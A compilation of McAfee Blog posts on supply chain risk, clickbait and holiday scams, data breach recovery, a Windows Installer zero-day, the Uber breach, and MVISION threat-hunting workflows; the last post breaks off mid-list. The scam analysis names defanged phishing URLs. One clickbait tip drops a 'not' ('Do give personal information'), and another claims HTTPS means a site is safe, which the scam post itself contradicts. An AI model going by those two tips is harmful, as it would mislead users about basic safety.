It’s not as though enterprises rely on their partners any more today than they did ten years ago. Their needs have not changed and are unlikely to change, except those rare instances where an enterprise will choose to manufacture their own supplies rather than rely on partners. Consider, for example, Costco creating its own gigantic chicken farm. Other than outlier examples like this, partner reliance is relatively stable.
What is changing with the supply chain is how much system access is being granted to these partners. They are getting access they didn’t always get and are getting far deeper access as well. As technology has advanced to allow such access, enterprises have accepted.
Given the wide range of partners–suppliers, distributors, contractors, outsourced sales, cloud platforms, geographical specialists, and sometimes your own largest customers–the cybersecurity complexities are growing by orders of magnitude. In addition, the more integrations that enterprises accept, the higher the level that their risk is. To be more precise, the risk doesn’t necessarily grow with the number of partners as much as the risk grows with the number of partners whose cybersecurity environments are less secure than the enterprise’s own environment.
To even begin to craft a cybersecurity strategy to manage partners and a global supply chain, the enterprise CISO needs to have a candid understanding of what their partners’ security level truly is. That is tricky, given that many of those partners themselves do not have a good sense of how secure or insecure they are.
One suggestion is to revise contracts to make it a requirement for all partners to maintain a security level equal to the enterprise customer. The contract must not only specify penalties for non-compliance–and those penalties must be sufficiently costly that it makes no sense for a partner to take that chance–but it must specify means to determine and re-verify that security level. Surprise inspections and the sharing of extensive log files would be a start.
Otherwise, even the strictest security environment such as Zero Trust may be unable to plug supply chain holes due to sloppier partner security practices. Let’s say that a large enterprise retailer is working with a large consumer goods manufacturer as a partner. A good environment will start with strict authentication, making sure that the user from the partner is really that authorized user. The enterprise environment must also watch the user throughout the session to make sure the user doesn’t do anything suspicious. But if the partner has been breached, malware could sneak in through the secure tunnel and, if it’s not caught by the enterprise, there’s a problem and now they can be breached.
This is not hypothetical. Since the beginning of the pandemic, our research found that a vast majority of global enterprises (81 percent) said that they are seeing far more attacks since the beginning of COVID-19.
Almost every business is dependent on the supply chain, making it a prime target for cybercriminals looking to cause disruption and breach wider networks. As the holiday season approaches, we are already seeing a spike in consumer and business activity across the supply chain, making it a prime target for cybercriminals looking to target essential and lucrative services.
Attackers are going to continue to leverage the global supply chain as an initial entry vector, accessing the network through a trusted connection, system, or user. The fact that these attacks exploit trusted channels makes them very difficult to prevent or detect. As organisations continue their digital transformation, including ever-more cloud services, managed services and endpoint modernization, the risks of supply chain threats will increase as its prevalence as a vector does so.
The post Fighting Supply Chain Threats Is Complicated appeared first on McAfee Blog.
We’ve all fallen for clickbait. Sometimes it’s a juicy headline designed to spark curiosity and drive traffic to a specific website. Other times it’s a quiz that will magically reveal your celebrity look-alike. While the innocent click connected to most clickbait is seemingly harmless, some clickbait can install dangerous malware onto your devices.
According to the FBI’s Crime Complaint Center’s 2020 Internet Crime Report, internet crime increased by 300,000 complaints from 2019 to 2020. This statistic represents a 50 percent increase over one year and losses exceeding $4.2 billion.
Some clickbait scams exploit current events and the cultural climate, according to the Better Business Bureau. The scam-tracking organization warns consumers to be wary of any news items, links, and popups that require you to give personal information. Depending on the scam’s goal, the wrong click can result in a slew of email or text spam, malicious data mining, or even a monthly charge on your phone bill. And the hidden hook? Clickbait appears to be harmless at first glance, so we often share it with friends without understanding the entire risk.
Clickbait relies on behavioral science. Bad actors online know that people are naturally curious. They want to understand, close their knowledge gaps, and be entertained. A popular article in Wired attributes our collective affinity for clickbait to the role emotion plays in our daily choices and to our lazy brains. We want instant gratification when filling our knowledge gaps online, cites Wired, which is why we forgo caution and opt for quick clicks we know won’t deliver on its promise.
One way to begin changing those habits and to teach our kids to do the same is by encouraging critical thinking and strengthening our digital literacy skills. Critical thinking is more than just pausing before you click. It’s understanding the environment. Critical thinking is using websites and apps with a keen eye toward the goals, motivations, and agendas of the content provider. It’s asking questions suchy as: Where will this link take me? What’s this app or link’s goal? Do I know the person who sent me this link? What is this person, app, or website asking me to do? What risks could be on the other side of this link?
The digital world and the paths we travel are littered with malicious landmines. One way to avoid those scams is to both stay educated and layer up with protection. Here’s how you (and your loved ones) can steer clear of the digital deception of clickbait.
Avoid clicking headlines that tout exclusive, shocking, or “you won’t believe what happened next” content or footage. If it sounds outrageous or smacks of gossip, it’s likely a scam.
Few people have the extra bandwidth to analyze internet content 24/7. For targeted protection against malware and viruses, consider comprehensive security software.
Clickbait sent via text (SMS) is called smishing, and it tends to spike during the holiday season. The link can appear from a big brand retailer and might alert you to a holiday package or encourage you to apply for a holiday loan. Do not click. Report smishing and forward the spam SMS message to the Spam Reporting Service at 7726 (SPAM).
Avoid questionable websites that prompt you to click on links, complete a survey, or download extra plug-ins to access the content you want. Look for the ‘S’ in HTTPS in URLs when browsing online. The ‘S’ means the website is safe and secure.
Do give personal information or banking details to unknown websites or share your password with any vendor or site.
If you hover over a hyperlink, its web address will pop up which could lead you to unfamiliar websites.
Today, sadly, you can’t even trust emails and direct messages, posts, or even texts from your friends because they may have been hacked. Bad actors have found ways to drop familiar details into conversations and reach out in personable ways that immediately gain your trust. Pause and analyze before liking or sharing a link to a news item, a giveaway, or an opportunity. It may not be your friend that posted or recommended the link.
You may agree with a headline or be outraged by a piece of “news,” but that doesn’t mean it’s true. Bad actors are savvy. They will exploit political division or a global tragedy and capitalize on fear by planting clickbait that is almost impossible to ignore without clicking. This tactic makes people feel emotionally compelled to share the story with others, which only increases the scam’s destruction. Look for spelling errors, poorly designed websites, and misspelled web addresses.
If something doesn’t look right, but you’re curious about the information in the headline, stop and do your research before sharing. Go to a reliable news site to verify the information.
There are bad actors, digital distractions, and cyber traps around every corner online. However, deciding to be intentional with your family’s online safety will render long-term habits that will shut out the bad actors online, making more room for the good stuff we all enjoy.
The post How to Help Your Kids Combat Clickbait Scams appeared first on McAfee Blog.
With the holidays on the horizon, spirits are high—and it’s those same high spirits that hackers want to exploit. ‘Tis the season for clever social engineering attacks that play on your emotions, designed to trick you into giving up personal info or access to your accounts.
Social engineering attacks unfold much like a confidence scam. A crook takes advantage of someone’s trust, applies a little human psychology to further fool the victim, and then pulls off a theft. Online, a social engineering attack will likely involve a theft attempt of personal or account information that the crook can then use to make purchases, drain accounts, and so forth.
Not at all in the holiday spirit, right? Let’s take a look at some of their top tricks so that you can spot and avoid them.
As said, spirits can get high this time of year. There’s looking forward to gatherings with family and friends, the fun that comes along with hunting for that perfect gift, and the excitement of the holidays overall. And that’s what hackers count on—people getting caught up in the rush of the holidays, to the point where they may not look at emails, offers, shipping notices, and such with a critical eye. That’s how the scammers get their foot in the door.
Some of their favored tricks can look a little like this:
What are the holidays without that trendy “must-get” gift item, the one that’s seemingly out of stock no matter where you look? Scammers are keen on these items as well and will prop up phony ads and storefronts that pretend to sell those items but really don’t. Instead, they’re just a shady way for them to steal your debit or credit card information—or to lift a few bucks out of your pocket in return for nothing.
One way to keep from getting burned by one of these scams is to follow the old adage, “If it looks too good to be true, it probably is.” In this case, crooks are using feelings of scarcity and urgency to get you to bite. Here’s where you can take a moment before you click to do some research.
Answers to these questions can separate the good businesses from the bogus ones.
Like the above, crooks will create a sense of urgency about a hot holiday item or limited time offer. The twist comes when they request payment via a gift card rather than by credit or debit card or other legitimate online payment methods. This request is highly deliberate because gift cards are much like cash. Once the money on the card is spent, it’s gone, and these cards do not offer the same protections that come with other payment methods.
You can avoid this one easily. If anyone asks you to use a gift card as payment, it’s a scam. Gift cards are for gifts, not payment, says the Federal Trade Commission (FTC). If you come across such a scam, you can report it to the FTC as well.
Donating to a charity in someone else’s name is often a popular gift. Much the same, giving a donation to a worthy cause feels particularly good this time of year. Once again, scammers will take advantage of these good intentions by propping up phony charities designed to do nothing more than dupe you out of your money. Whether that’s a flat-out phony charity or one of the many other scam charities that have been known to pocket 90 cents of every dollar donated, this is the time of year to be on the lookout for both.
The advice here is much the same as the advice for avoiding phony businesses and retailers. Do your homework. The Better Business Bureau maintains a listing of charities that can help you make good donation choices. Also, your state government’s charity officials can help you separate good charities from bad—and even file a report if you suspect a scam is at play.
And once again, if a charity is asking for donations in the form of cash, gift cards, or wire transfer, just say no. That’s a surefire sign of a scam.
Scammers know you have packages in transit this holiday season, loaded with gifts that you’re eagerly tracking. Enter another classic scam—the phony shipping notice. The idea is that you already have so many packages on their way that you won’t think twice about opening an email with a “shipping notice” that comes in the form of an attachment. Of course, that attachment is a fake. And it’s loaded with malware.
Too bad for scammers, though. This is another one you can steer clear of rather easily. Don’t open such attachments. Shipping companies will almost certainly send along notices and invoices in the body of an email, not as an attachment. If you have a question, you can always visit the shipper’s website and look up your tracking info there. Likewise, follow up with the customer service department of the company that you purchased the item from in the first place.
While the holidays are a special time for scammers too, there are several things you can do to up the level of your protection now and year ‘round. A quick list includes:
No doubt, the holidays have a feel all to themselves, one which hackers and crooks want to take advantage of. They’ll craft their tricks accordingly and try to twist the good times that roll around at the end of the year into scams that capitalize on your good intentions. As you can see, it’s not too tough to spot them for what they are if you pause and take a moment to scrutinize those emails, offers, and sales. And that’s the thing with the holidays. We can all feel pinched for time at some point or other during this stretch. Look out for their pressure tactics and seemingly clever ways of using social engineering to rip you off. That way, you can spend the holidays focusing on what’s important—your friends and family.
The post Social Engineering: Tis the Season for Tricky Hackers appeared first on McAfee Blog.
Co-authored by: Sriram P and Deepak Setty
‘Tis the season for scams. Well, honestly, it’s always scam season somewhere. In 2020, the Internet Crime and Complaint Center (IC3) reported losses in excess of $4.1 billion dollars in scams which was a 69% increase over 2019. There is no better time for a scammer celebration than Black Friday, Cyber Monday, and the lead-up to Christmas and New Year. It’s a predictable time of the year, which gives scammers ample time to plan and organize. The recipe isn’t complicated, at the base we have some holiday excitement, sprinkle in fake shopping deals and add some discounts, and ho ho ho we have social engineering scams.
In this blog, we want to increase awareness related to scams as we expect elevated activity during this holiday season. The techniques used to scam folks are very similar to those used to spread malware too, so always be alert and use caution when browsing and shopping online. We will provide some examples to help educate consumers on how to identify scams. The victims of such scams can be others around you like your kids or parents, so read up and spread the word with family and friends. Awareness, education, and being alert are key to keeping you at bay from fraudsters.
Although there is a myriad of scams out there, we expect the most common scams and targets this season to be:
SMSishing, email-based Phishing, and push notifications will be the most common vectors initiating scams during this holiday season. Here are some common tactics in use today:
This is a common theme around this time of the year. Deals, discounts, and gift cards can be costly to your bank account. Be wary of URLs being presented to you over email or SMS. Phishing emails, bulk mailing, texting, and typo-squatting are some of the ways that scammers target their prey.
Scammers will create a sense of urgency by telling you that you have limited time to claim the deal or that there is low inventory for popular items in their store. It’s not difficult for scammers to identify sought-after electronics items or holiday gifts for sale and offer them for sale on their fake stores. Such scams are believable given the supply chain challenges and delivery shortages over the last few months.
Getting people worried about a life-changing event or disrupting travel plans can be concerning. So, if you get an unexpected call from someone claiming to be from the FBI, police, IRS, or even a travel company, stop and think. They may be using scare tactics to dupe you. Never divulge personal information and if in doubt, ask them a lot of directed questions and fact check them. As an example, check to see if they know your home address, account number, itinerary number, or bank balance depending on who they claim to be. Scammers typically don’t have specific details and when put on the spot, they’ll hang up.
Like scare tactics, scammers may prey on vulnerable people. Although there can be many variations of such scams, the more common ones are Romance Scams where you end up connecting to someone with a fake profile, and Fake Charity Scams where you receive a phone call or an email requesting a donation. Do not entertain such requests over the phone especially if you receive a phone call soliciting a donation. During the conversation, they will attempt to make you feel guilty or selfish for not contributing enough. Remember, there is no rush to donate. Go to a reputable website or a known organization and donate if you must after due diligence.
Successful scams are situationally accurate. You may be the smartest guy in the room, but when you eagerly waiting for that delivery and you see an email update claiming a delivery delay from UPS, you might fall for a scam. This is particularly true in the holiday season and therefore such themes are more prevalent. Here are some tips on how to identify scams early on.
If you believe that you have been a victim of a scam, here are a few tips that might help.
It’s become more common recently to receive text messages for scammers. The following few text messages demonstrate SMSishing attempts.
2. The following are fake texts that attempt to entice you click the link. The bait is the Gift card. One can tell that they are a similar theme since they originate from fake phone numbers, which are very similar but not exact. The domain names of the two URLs are totally random (probably compromised URLs). You can tell that back in October, the full URL based SMShing attempts were not very effective which is why in Nov, they probably used keywords like “COSTCO” and “ebay” within the URL and inline to their SMS context, to make it more likely for people to click.
Also note that some of the URLs only have an “http” versus a “https”, something we had noted earlier in the blog.
One cannot trust an email by the text. You should review the link to ensure it takes you to where it claims to. The following is an example email where the link is not what it claims to be.
Shopify is a Canadian multinational e-commerce company. It offers online retailers a suite of services, including payments, marketing, shipping, and customer engagement tools.
So, where there is money to be made, individuals are looking to take advantage. Shopify scam targets both consumers and business owners. Scammer abuse the power of e-commerce to earn money by implementing fake stores. They observe the product or category, create an attractive logo or image and promote extensively on social media.
Fake Bike Online Purchase store – Mountain-ranger-com
Site: hxxps://mountain-ranger-com.myshopify.com/collections/all
SSL info:
This site is hosted on Shopify, so it has a valid SSL cert which is the first thing we check on where we transact.
Whois Record ( last updated on 2021-11-19 )
Domain Name: myshopify.com
Registry Domain ID: 362759365_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2021-03-02T23:39:12+0000
Creation Date: 2006-03-03T03:01:37+0000
Registrar Registration Expiration Date: 2024-03-02T08:00:00+0000
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.2083895770
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registrant Organization: Shopify Inc.
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Select Request Email Format
The registrar info for the site is valid too, as it is hosted on Shopify. If you look closer, however, one will notice red flags:
Examples of similar sites showing incredible discounts.
2. The “About Us” doesn’t make much sense when you see the products that are being offered:
A quick google on the text shows that multiple sites are using the same exact text (most of them probably fake)
3. There are no customer reviews about the products listed.
4. It has a public email server (gmail) in its return policy
5. Looking up the list address in google maps wouldn’t show up anything and looking up the number in apps like true caller shows it’s fake.
The goal of this scam is to steal credentials however it could as well be used as a malware delivery mechanism. The screenshot is that of a fake business proposal hosted on OneDrive Cloud for phishing purposes.
The actor aims to mislead the user into clicking on the above reference link. When the user clicks on the link, it redirects to a different website that displays the below fake OneDrive screenshot.
hxxps://aidaccounts[.]com/11/verified/22/
If a user enters their OneDrive details, the actors receive them at their backend. This means that this victim has lost their login credentials to the phishing actors. Look at the address bar and trust your instincts. This is in no way related to Microsoft OneDrive. There are other such examples where they do some additional plumbing of the URL to include keywords that make it more believable – as they did in the SMSishing example above.
The goal here is to get the user to accept push notifications. Doing so makes the customer susceptible to other possible scams. In this example, the scammers attempt to get users to fill out surveys. Legit companies online pay users for surveys. A referral code is used to pay the survey taker. The scammer in this case attempts to get others to fill the survey on their behalf and therefore makes money when such surveys use the scammer’s referral code. Push notifications are used to get the victims to fill out surveys. Previous blogs from McAfee demonstrate similar scams and how to prevent such notifications
The initial vector comes to the victim via a spam email with a PDF Spam attachment. In this scenario, Gmail was used as the sender.
Upon opening the PDF, a fake online PUBG (Players Unknown Battleground) credits generator gets opened. In PUBG, Gamers need credits to participate in various online games and so this scam baits them offering free credits.
Once the user clicks on the bait URL, it opens a google feed proxy URL.
Malicious websites are destined to be block-listed and therefore have short shelf lives. Google’s feed proxy redirects them in adapting to new URLs and therefore utilizes a fast-flux mechanism as a technique to keep the campaign alive. Usage of feed proxy are not new and we have highlighted its use in the past by the hancitor botnet.
Clicking on the top highlighted URL, it navigates to a webpage that poses as a PUBG Arcane online credit generator.
To make the online generator look real, the website has added fake recent activities highlighting coins users have earned via this generator. Even the add comments section is fake.
Clicking on continue will bring up a fake progress bar. Now the site shows the coins and cash are ready, however, an automated human verification has failed, and a survey has to be taken up for getting the reward.
A clickable link for this verification is also loaded. Once clicked, a small dialog with 3 options are presented.
Clicking on “want to become a millionaire” loaded a survey page and prompts you to take it up. It will also prompt you to allow push notifications from this website.
Once you click on “Allow”, notifications to take up a survey or fake personalized offer notifications start popping up. Be it on your desktop or on your mobile, these notifications pop-ups to take up more surveys.
Clicking on the other links too from “Human Verification”, you will realize that you have finally ended up not gaining anything for your PUBG Arcane gaming, but ended up taking surveys.
Here is another example of a PDF theme we have seen as a lure on the Lenovo tablet offer.
Clicking on this link takes the user to a page that claims it has been protected by a technique to block bots. Persuading you to click on the allow button for enabling popups.
Once you click on the enable button, it then redirects the browser to take up a random survey. In our case, the survey was on household income.
Another such theme that we observed was around the latest Netflix series – Squid games. Although Series 1 has currently been released, the fake email prompts early access to Season 2.
Scammers spend a lot of time and effort tweaking and tuning their schemes to make it fit just right for you. Avoiding a scam is not full proof but being vigilant is key. Don’t get overly keen when you get offers thrown at you this season. Take a step back, relax and think it through, not only should you do your own research, but you should also trust your instincts. Spending a little extra on products or making donations to a reputable and known organization might be worth the peace of mind during the holidays. Help educate your family and contribute by reporting scams.
Happy Holidays!
The post ‘Tis the Season for Scams appeared first on McAfee Blog.
How does that information get collected in the first place? We share personal information with companies for multiple reasons simply by going about our day—to pay for takeout at our favorite restaurant, to check into a hotel, or to collect rewards at the local coffee shop. Of course, we use our credit and debit cards too, sometimes as part of an online account that tracks our purchase history.
In other words, we leave trails of data practically wherever we go these days, and that data is of high value to hackers. Thus, all those breaches we read about.
Whether it’s a major breach that exposes millions of records or one of many other smaller-scale breaches like the thousands that have struck healthcare providers, each one serves as a reminder that data breaches happen regularly and that we could find ourselves affected. Depending on the breach and the kind of information you’ve shared with the business or organization in question, information stolen in a breach could include:
What do crooks do with that data? Several things. Apart from using it themselves, they may sell that data to other criminals. Either way, this can lead to illicit use of credit and debit cards, draining of bank accounts, claiming tax refunds or medical expenses in the names of the victims, or, in extreme cases, assuming the identity of others altogether.
In all, data is a kind of currency in of itself because it has the potential to unlock several aspects of victim’s life, each with its own monetary value. It’s no wonder that big breaches like these have made the news over the years, with some of the notables including:
Facebook – 2019: Two sets of data exposed the records of more than 530 million users, including phone numbers, account names, and Facebook IDs.
Marriott International (Starwood) – 2018: Half a million guests had names, email and physical mailing addresses, phone numbers, passport numbers, Starwood Preferred Guest account information, dates of birth, and other information about their stays exposed.
Equifax – 2017: Some 147 million records that included names, addresses, dates of birth, driver’s license numbers, and Social Security Numbers were exposed, along with a relatively small subset of 200,000 victims having their credit card information exposed as well.
As mentioned, these are big breaches with big companies that we likely more than recognize. Yet smaller and mid-sized businesses are targets as well, with some 43% of data breaches involving companies of that size. Likewise, restaurants and retailers have seen their Point-of-Sale (POS) terminals compromised, right on down to neighborhood restaurants.
When a company experiences a data breach, customers need to realize that this could impact their online safety. If your favorite coffee shop’s customer database gets leaked, there’s a chance that your personal or financial information was exposed. However, this doesn’t mean that your online safety is doomed. If you think you were affected by a breach, there are multiple steps you can take to help protect yourself from the potential side effects.
One of the most effective ways to determine whether someone is fraudulently using one or more of your accounts is to check your statements. If you see any charges that you did not make, report them to your bank or credit card company immediately. They have processes in place to handle fraud. While you’re with them, see if they offer alerts for strange purchases, transactions, or withdrawals.
File a police report and a Federal Trade Commission (FTC) Identity Theft Report. This will help in case someone uses your Social Security number to commit fraud, since it will provide a legal record of the theft. The FTC can also assist by guiding you through the identity theft recovery process as well. Their site offers a step-by-step recovery plan that you can follow and track your progress as you go.
If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity. You can place one fraud alert with any of the three major credit reporting agencies (Equifax, Experian, TransUnion) and they will notify the other two. A fraud alert typically lasts for a year, although there are options for extending it as well.
Freezing your credit will make it highly difficult for criminals to take out loans or open new accounts in your name, as a freeze halts all requests to pull your credit—even legitimate ones. In this way, it’s a far stronger measure than placing a fraud alert. Note that if you plan to take out a loan, open a new credit card, or other activity that will prompt a credit report, you’ll need to take extra steps to see that through while the freeze is in place. (The organization you’re working with can assist with the specifics.) Unlike the fraud alert, you’ll need to contact each major credit reporting agency to put one in place. Also, a freeze lasts as long as you have it in place. You’ll have to remove it yourself, again with each agency.
Ensure that your passwords are strong and unique. Many people utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials, such as one you’ll find in comprehensive online protection software.
A solution such as this will help you to monitor your accounts and alert you of any suspicious activity. Specifically, our own Identity Protection Service will monitor several types of personally identifiable information, alert you of potentially stolen personal info, and offer guided help to neutralize the threat. Also, it can help you steer clear of some types of theft with preventative guidance that can help keep theft from happening in the first place. With this set up on your computers and smartphone you can stay in the know and address issues immediately.
To use your credit card safely online to make purchases, add both a VPN and password manager into your toolbox of security solutions. A VPN keeps your shopping experience private, while a password manager helps you keep track of and protect all your online accounts. Again, you’ll find a VPN as part of comprehensive online protection software.
The post Affected by a Data Breach? Here Are Security Steps You Should Take appeared first on McAfee Blogs.
This month it was disclosed that a Microsoft vulnerability that allows for local privilege elevation, previously patched in the November 2021 Patch Tuesday, is still exploitable and was not patched correctly. Using this vulnerability, threat actors with limited access to a compromised device can easily elevate their privileges to help spread laterally within the network.
Figure 1. MITRE ATT&CK Matrix for Windows Zero-Day in MVISION Insights
The vulnerability affects all supported versions of Windows, including Windows 10, Windows 11, and Windows Server 2022. At the time of writing, Microsoft has not released any updates or out-of-band patches to resolve it.
CVE-2021-41379 – Microsoft Windows Installer Elevation of Privilege Vulnerability
Bleeping Computer: New Windows zero-day with public exploit lets you become an admin
Bleeping Computer: Malware now trying to exploit new Windows Installer zero-day
McAfee Enterprise Global Threat Intelligence is currently detecting all known proof of concept exploits for this zero-day vulnerability as malicious.
McAfee Enterprise Endpoint Security (ENS) is currently detecting exploitation attempts and will quarantine the tools utilized to exploit this vulnerability as shown below.
Figure 2. Story Graph summary of exploitation detection by McAfee Enterprise ENS shown in MVISION ePO
MVISION Endpoint Detection and Response (EDR) is currently alerting to the activity of this exploitation as malicious and will note the MITRE techniques and any suspicious indicators related to the exploit attempts.
Figure 3. Detection of zero-day exploitation activity and techniques in MVISION EDR
MVISION Insights will provide the current threat intelligence and known indicators for exploitation of this vulnerability. MVISION Insights will also alert to detections that have been observed, and systems that require additional attention, to prevent widespread infection. MVISION Insights will also include Hunting Rules and Campaign Connections for threat hunting and further intelligence gathering of the threat activity and adversary.
MVISION Insights Campaign: New Windows Zero-Day CVE-2021-41379 With Public Exploit Lets You Become an Admin
Figure 4. Global Prevalence of zero-day exploitation activity in MVISION Insights
Figure 5. Exploitation IOCs and Detections in MVISION Insights
McAfee Enterprise offers Threat Intelligence Briefings along with Cloud Security and Data Protection workshops to provide customers with best practice recommendations on how to utilize their existing security controls to protect against adversarial and insider threats; please reach out if you would like to schedule a workshop with your organization.
The post McAfee Enterprise Defender Blog | Windows Zero-Day – CVE-2021-41379 appeared first on McAfee Blog.
You may have spotted the news last week that U.S. federal prosecutors brought charges against the former chief security officer of Uber. At issue was a breach that occurred in 2016, where prosecutors allege that he covered up a $100,000 payoff to the hackers responsible for the attack. The specific charges are obstructing justice and concealing a felony for the alleged cover-up.
While the breach itself is relatively old news and the company has since paid a $148 million settlement along with an agreement to regular audits of its privacy and security systems, this is a reminder that breaches happen. What’s more, it may be some time before you become aware of them, even in instances when companies move quickly, transparently, and in your best interest.
According to research we recently published, nearly three-quarters of all breaches have required public disclosure or have affected financial results, up five points from 2015. Additionally, industry studies show that it can take roughly nine month on average to identify and contain a breach. Yes, that’s more than nine months, and a lot can happen to your credit in that timeframe. Thus the onus is on us to be vigilant about our own credit.
Here’s a quick list of things you can do right now to keep on top of your credit—and that you can do on an ongoing basis as well, because that’s what it takes to keep tabs on your personal info today.
Closely monitor your online accounts: Whether it’s your credit card statements, banking statements, or your individual accounts for services like Uber, review them closely. If you see any suspicious activity, notify the institution or service and put a freeze on your account(s) as needed. Even a small charge can indicate a bigger problem, as that means your information is out there in the wild and could be used for bigger purchases down the pike. In the event you feel your Uber account has been compromised, you can contact them via their “I think my Uber account has been hacked” page.
Update your settings: That includes your privacy settings in addition to changing your password. As far as passwords go, strong and layered passwords are best, and never reuse your credentials across different platforms. Plus, update your passwords on a regular basis. That’ll further protect your data. Using a password manager will help you keep on top of it all, while also storing your passwords securely.
Enable two-factor authentication: While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.
Check your credit: Depending on where you live, there are different credit reporting agencies that keep a centralized report of all your credit activities. For example, the major agencies in the U.S. are primarily Equifax, Experian, and TransUnion. Likewise in the U.S., the Fair Credit Reporting Act (FCRA) requires these agencies to provide you with a free credit check at least once every 12 months. It’s a relatively quick process, and you might be surprised what you find—anywhere to incorrect address information to bills falsely associated with your name. Get your free credit report here from the U.S. Federal Trade Commission (FTC). Other nations provide similar services, such as the free credit reports for UK customers.
Freeze your credit: Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
Consider using identity theft protection: A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity in addition to the activities I’ve listed above. Additionally, you can use a comprehensive security solution such as McAfee Total Protection to help protect your devices and data from known vulnerabilities and emerging threats.
For all the technology we have at our fingertips, our best defense is our eyes. Keeping a lookout for fishy activity and following up with family members when unfamiliar charges show up on your accounts will help you keep your good name in good standing.
The thing is, we never know when the next data breach might hit and how long it may be until that information is discovered and finally disclosed to you. Staying on top of credit has always been important, but given all our apps, accounts, and overall exposure these days, it’s a must.
To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.
The post Uber Data Breach and How to Protect Your Info appeared first on McAfee Blog.
On November 17, 2021, The US Cybersecurity & Infrastructure Security Agency (CISA) pushed an Alert entitled “Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities” which you need to pay attention to if you use Microsoft Exchange or Fortinet appliances. It highlights one Microsoft Exchange CVE (Common Vulnerability & Exposure), three Fortinet CVEs and a list of malicious and legitimate tools associated with this activity.
A few hours later our Advanced Threat Research (ATR) team published a new campaign in MVISION Insights under the name “Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities”. Immediately after, MVISION Insights started to provide near real-time statistics on the prevalence of the tools associated to this threat campaign by country and by sector.
Figure 1. MVISION Insights Global prevalence statistics for this campaign on Nov 19, 2021
In this blog I want to show you how you can operationalize the data linked to this alert in MVISION Insights together with your investigation and protection capabilities to better protect your organization against this threat.
MVISION Insights combines Campaigns and Threat Profiles in the same list, and you can change the order from “Last Detected” to “Last Added” as shown below.
Figure 2. List of MVISION Insights campaigns last added, with a selection of this campaign
On the left of figure 2, a color code shows you the severity assigned by the McAfee ATR team (Medium for this campaign), in the middle you can see whether we have seen detections of the analysed IOCs in your country or in your sector
If you are a McAfee Endpoint Security or IPS customer, on the right of figure 2 you can see whether you have had any detection of these IOCs by your McAfee Endpoint Security or IPS, or whether Endpoint Security has found exposed devices, or devices with insufficient Endpoint Security protection
As shown in figure 2, you can also click the campaign’s preview to read a short description, and the labels given by MVISION Insights:
In this case, you can see that CISA suspects this campaign to be associated with an APT threat group. It includes Ransomware behaviors. The labels also highlight the use of hacking tools and vulnerabilities which you can then view in the Campaign details. Last September we hosted a webinar focused on threat intelligence and protection against hacking tools.
The campaign description highlights the usual use of “devices encrypted with the Microsoft Windows BitLocker encryption feature”.
The campaign’s details also provide links to other sources, such as the CISA alert in this case.
Figure 3. Original CISA Alert used for this campaign
Once you have identified campaigns which could potentially hit you, you can evaluate your risk and whether you could be exposed because you could have:
Figure 4. List of Common Vulnerabilities and Exposures (CVEs) in this campaign’s details
If you are a McAfee Enterprise customer, the MVISION Insights Endpoint Security Posture checks whether you have enabled the necessary Endpoint Security features to have the best level of protection across your estate.
In the example below:
As seen previously, this lab environment has sufficient protection to detect the “Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities” campaign IOCs. However, to have full Endpoint protection, GTI, On-Access scan, Exploit Prevention, Real Protect and ATP must be enabled.
Figure 5. McAfee Endpoint Security Detection across all MVISION Insights campaigns
If you are a McAfee Endpoint Security or IPS customer, the detections related to the campaign’s IOCs are automatically mapped by MVISION Insights as shown in Figure 6.
Figure 6: McAfee Endpoint Security Detection across all MVISION Insights campaigns
You can also use your Endpoint Detection and Response (EDR) or SIEM solution to search for the presence of IOCs. As you can see below in Figure 7, we have categorized the IOCs, and in this instance:
If you are an MVISION EDR customer, you can automatically search for the presence of these IOCs across your estate from MVISION insights
Otherwise, you can export the IOCs and hunt them in your EDR, and SIEM, to examine the evidence of a potential compromise and escalate the case to a level2 or level3 analyst to run a full investigation.
Additionally, you can also use the MVISION APIs with a third-party Threat Intelligence Platform such as ThreatQ, ThreatConnect or MISP to orchestrate this threat hunting capability.
Figure 7: MVISION Insights IOCs for this campaign
You can also leverage the new Campaign Connections feature (Figure 8) to check whether these IOCs are also listed in other campaigns or threat profiles. Campaign collection uses graphs to connect all the MVISION campaigns, and threat profile data such as:
Figure 8: MVISION Insights Campaign connection using the IOCs of this campaign
Beyond the IOCs, your Threat Analysts can also leverage the MITRE Techniques and Tools related to this campaign and documented in MVISION Insights.
Figure 9: MITRE Techniques and Tools observed in MVISION Insights for this campaign
For example, here you could use MVISION EDR to look for the presence of:
Then you can quarantine suspected devices before running a full remediation. You can also check that your Endpoint Security solution has credential theft protection capabilities such as ENS credential theft protection.
If your organization hosts Microsoft Exchange or Fortinet appliances you will need to apply the recommended patching and upgrade recommendations. If you find indicators of compromise you might want to increase the priority of the tickets, asking the Fortinet and Microsoft Exchange administrators to fix these CVEs due to these suspicious activities.
To better assess your risk and exposure against this campaign you should review your current capabilities to:
